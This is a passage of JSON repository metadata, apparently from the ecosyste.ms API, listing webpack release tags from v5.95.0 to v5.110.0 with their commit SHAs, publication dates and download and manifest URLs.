ack/tags/v5.110.1/manifests"},{"name":"v5.110.0","sha":"3a7c0e6e27f90f9c5e407c18506a5034aabcf27d","kind":"commit","published_at":"2026-08-27T11:27:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.110.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.110.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.110.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.110.0/manifests"},{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/ta